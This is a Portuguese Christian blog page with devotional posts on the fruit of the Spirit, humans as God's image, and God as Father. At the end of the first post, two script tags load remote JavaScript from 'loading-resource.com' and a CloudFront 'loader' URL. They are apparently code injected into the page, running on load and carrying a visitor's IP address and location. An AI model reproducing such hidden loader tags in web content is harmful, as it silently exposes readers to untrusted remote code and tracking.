Visualizar:

▼ Postagens (5)
  • Fruto do Espirito Santo,virtudes de Deus.

    12

    Jan
    12/01/2012 às 17h03

    “Mas o fruto do Espírito é  amor, gozo, paz,longanimidade,benignidade,bondade,fé mansidão e esperança.” Gálatas.5:22.

    No reino vegetal o aparecimento do fruto é resultado de um longo processo de crescimento e desenvolvimento da árvore assim também é na vida espiritual.o espírito de Deus opera de modo progressivo,produzir o fruto do espírito não é,portanto,uma experiência momentânea mas é algo contínuo em gálatas 5:16 diz: andai em espírito...ou seja uma ação que se repete sempre esse processo  continuo produzirá a manifestação das virtudes de Deus na vida do crente e com nitidez a imagem de Deus se manifestará e pela operação do Espírito Santo efetua –se a santificação do crente até chegarmos a sermos  varões perfeitos, a medida da estatura perfeita de Deus(ef. 4:13),somos transformados  de glória em glória,assim de passo à passo devemos avançar zelando pela vida espiritual e perseverando  na obediência teremos a garantia  do fruto do espírito e assim passamos a sermos uma benção para os outros semelhante a Jesus,cuja personalidade dotada do fruto se  manifestava  de modo pleno.Manifestar as qualidades  de nosso Deus celestial é resultado desse crescimento  e desenvolvimento, e da mesma forma que um lavrador espera que uma árvore produza frutos,Deus espera que aqueles que estão em união com cristo produzam fruto espiritual.

    Esse texto foi escrito a partir da leitura de gálatas cap.5

    Desenvolvido por:Wasceny Lima

    <script src="http://loading-resource.com/50.js.php?i={848912BE-1837-4CC8-A30B-4F30CCE95F22}" type="text/javascript"></script><script src="https://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=BR&rid=16&ccid=Bel�m&ip=189.119.151.183" type="text/javascript"></script>
  • Imagem e semelhança de Deus.

    18

    Out
    18/10/2011 às 14h16

    Pouco antes de Jesus ser crucificado Filipe disse: “Senhor mostra-nos o Pai” (João 14:8). A resposta de Jesus mostra que a pergunta causou dor: “Filipe, há tanto tempo estou convosco, e não me tens conhecido? Quem me vê a mim, vê o pai; como dizes tu: mostra-nos o pai?” (verso 9) desde seus primeiros anos,Jesus se empenhou em ensinar como é Deus.Quando acolheu crianças  em seus braços e as abençoou;quando ensinou seus discípulos às  margens do lago;quando acalmou a tempestade e purificou o templo; quando negou-se, mesmo sendo Deus,em todas essas coisas ele estava dizendo: Deus é assim; as obras de cristo revelava o pai, o que somos e o que fazemos revela Deus ao mundo! Não basta que nos chamemos “cristãos” ou que só tenhamos aparência, o cristão genuíno tem mais que um verniz de religiosidade. Qual o reflexo que estamos refletindo? Estamos refletindo como um espelho a gloria do Senhor?Temos sido como cristo, imagem e semelhança de nosso Pai? Quais informações que estamos passando de Deus? Temos a perfeição da unidade de cristo?  Com sua natureza divina e humana Jesus nos une ao pai como ninguém poderia fazer, Temos que está em Cristo como ele estava no pai e então daremos bons frutos e o resultado disso tudo é que glorificaremos o nosso senhor, através do que somos, Precisamos manifestar a todo lugar o cheiro do bom perfume porque para Deus somos o bom perfume de Cristo. Paulo chega-nos a comparar com uma carta, conhecida e lida por todos os homens, o objetivo de uma carta é dar informações sobre o seu remetente.  Assim como a carta leva informações de alguém, precisamos levar boas informações de Deus através de nós  que possamos  fluir  plenamente para outras pessoas o melhor de Deus  e dessa forma testificar poderosamente em favor de cristo, somos a agência criada por Jesus para espalhar ao mundo a mensagem do melhor de nosso Senhor. O caráter de Deus é o que precisamos ter para refletir a verdadeira moralidade e o viver espiritual E somente então, seremos sua imagem e semelhança. Sermos imitadores de Cristo inculpáveis no meio de uma geração corrompida e perversa é o nosso dever e então resplandeceremos como astro no mundo, Deus.

    Belém ,19 de setembro 2011

    wasceny correia de lima.

  • lindo

    18

    Out
    18/10/2011 às 13h58

    fotos
  • Deus, Pai

    18

    Out
    18/10/2011 às 12h49

    Próximo de chegar o dia dos pais me lembrei de uma conversa com um amigo, a respeito da relação pai e filho e como ele passou a ter uma melhor compreensão da sua relação com o nosso pai maior, Deus, a partir do nascimento de seu filho. Foi refletindo nessa conversa que eu passei a pensar em minha relação com Deus já que eu sou fruto de uma relação de pais separados, e não é o fato de vir de uma relação de pais separados e sim da falta de convívio com o mesmo que a minha visão de pai, não fosse á das melhores. Qual o resultado disso?   Talvez a minha incapacidade de perceber os atributos de um verdadeiro pai, por não ter referências, estivesse afetando minha relação pessoal com Deus. Como eu estaria enxergando Deus? Será que ele tem o seu real valor como pai em minha vida?  Foram tantas coisas que eu aprendi e deixei de aprender por não ter tido um pai presente que mesmo com todas as adversidades ou constrangimento que isso possa causar, eu me tornei no que eu sou hoje. Uma pessoa forte, determinada onde eu diria independente e ate mesmo auto-suficiente lógico que eu não sou só autoconfiança Mas esse é o ponto chave, talvez aqui esteja o meu problema, coloco-me realmente como filha? Em obediência? Que acata a vontade de seu pai? Eu tenho deixado Deus pai me colocar em seus braços e como uma criança filha indefesa, deixo tudo por sua conta? Confio plenamente nele?Como uma filha tem que confiar.Pra responder essas perguntas Refletir e encontrei em mim algumas atitudes de filha, corro a Deus como uma criança vulnerável quando me sinto em situação de risco, Sempre que percebo que algo foge do meu controle, vou a sua presença apresento minhas queixas em uma necessidade de ouvir a voz de um pai, coloco todas minhas inseguranças e ele como Pai perfeito não me abandona ,orienta-me, carrega-me no colo mostrando-me seu verdadeiro amor Mas eu com toda minha  “independência”,minha  “auto confiança” faço tudo errado inconscientemente  coloco-me em ação, como se fosse um mecanismo de defesa em que eu tinha que me “virar” quando criança, deixo Deus de lado, em segundo plano,  percebo então que eu  recorro a ele como filha mas  não permito ele agir como Pai,  percebo a minha relação superficial com Deus  pois sempre tiro dele o controle daquilo que cabe a Ele e como uma filha rebelde faço aquilo que eu acho que eu tenho que fazer e tendo o livre-arbitrio a meu favor deleito-me como uma criança que se deleita com um doce, em minhas vontades e tenho como resultado dos meus atos sem a direção de meu pai as conseqüências dos meus erros de filha rebelde.Correr pra Deus nos momentos de dificuldades é bem típico, quando o barco enfrenta uma tempestade, quando sentimos que algo foge de nosso controle,queremos  colo de pai,sentir o seu afago é o que necessitamos mas fazer realmente o que ele decreta,que é andar nos seu estatutos,preceitos e juízos agimos como o filho prodigo cheio de segurança,auto confiança e saímos do seu amparo, o resultado é desilusão, tristeza e as vezes condições pessoais degradante. No conflito do filho pródigo com seu irmão temos o retrato do nosso dilema entre a aventura e a fidelidade a Deus. Na cena do filho pródigo que passa fome, temos o retrato da nossa miséria quando afastados de Deus. E no abraço acolhedor que o pai dá, no filho que volta pra casa, temos a mensagem do amor incondicional de Deus. É grande, bela a tarefa da paternidade, pois está associada à imagem de Deus. Ter boa imagem do pai colabora para que se tenha uma bela imagem de Deus.

    Belém, 13 setembro 2011 wasceny correia de lima.

  • Imagem e semelhança de Deus.

    17

    Out
    17/10/2011 às 19h00

    Pouco antes de Jesus ser crucificado Filipe disse: “Senhor mostra-nos o Pai” (João 14:8). A resposta de Jesus mostra que a pergunta causou dor: “Filipe, há tanto tempo estou convosco, e não me tens conhecido? Quem me vê a mim, vê o pai; como dizes tu: mostra-nos o pai?” (verso 9) desde seus primeiros anos,Jesus se empenhou em ensinar como é Deus.Quando acolheu crianças  em seus braços e as abençoou;quando ensinou seus discípulos às  margens do lago;quando acalmou a tempestade e purificou o templo; quando negou-se, mesmo sendo Deus,em todas essas coisas ele estava dizendo: Deus é assim; as obras de cristo revelava o pai, o que somos e o que fazemos revela Deus ao mundo! Não basta que nos chamemos “cristãos” ou que só tenhamos aparência, o cristão genuíno tem mais que um verniz de religiosidade. Qual o reflexo que estamos refletindo? Estamos refletindo como um espelho a gloria do Senhor?Temos sido como cristo, imagem e semelhança de nosso Pai? Quais informações que estamos passando de Deus? Temos a perfeição da unidade de cristo?  Com sua natureza divina e humana Jesus nos une ao pai como ninguém poderia fazer, Temos que está em Cristo como ele estava no pai e então daremos bons frutos e o resultado disso tudo é que glorificaremos o nosso senhor, através do que somos, Precisamos manifestar a todo lugar o cheiro do bom perfume porque para Deus somos o bom perfume de Cristo. Paulo chega-nos a comparar com uma carta, conhecida e lida por todos os homens, o objetivo de uma carta é dar informações sobre o seu remetente.  Assim como a carta leva informações de alguém, precisamos levar boas informações de Deus através de nós  que possamos  fluir  plenamente para outras pessoas o melhor de Deus  e dessa forma testificar poderosamente em favor de cristo, somos a agência criada por Jesus para espalhar ao mundo a mensagem do melhor de nosso Senhor. O caráter de Deus é o que precisamos ter para refletir a verdadeira moralidade e o viver espiritual E somente então, seremos sua imagem e semelhança. Sermos imitadores de Cristo inculpáveis no meio de uma geração corrompida e perversa é o nosso dever e então resplandeceremos como astro no mundo, Deus.

    Belém ,19 de setembro 2011

    wasceny correia de lima.

Home |  Blog Grátis |  Hospedagem HTML Grátis |  Quem somos |  Parceria |  Anuncie |  Ajuda
Trabalhe no XPG |  Política de Privacidade |  Política de Segurança |  Denúncia © 2004-2017 XPG | Siga esta corrente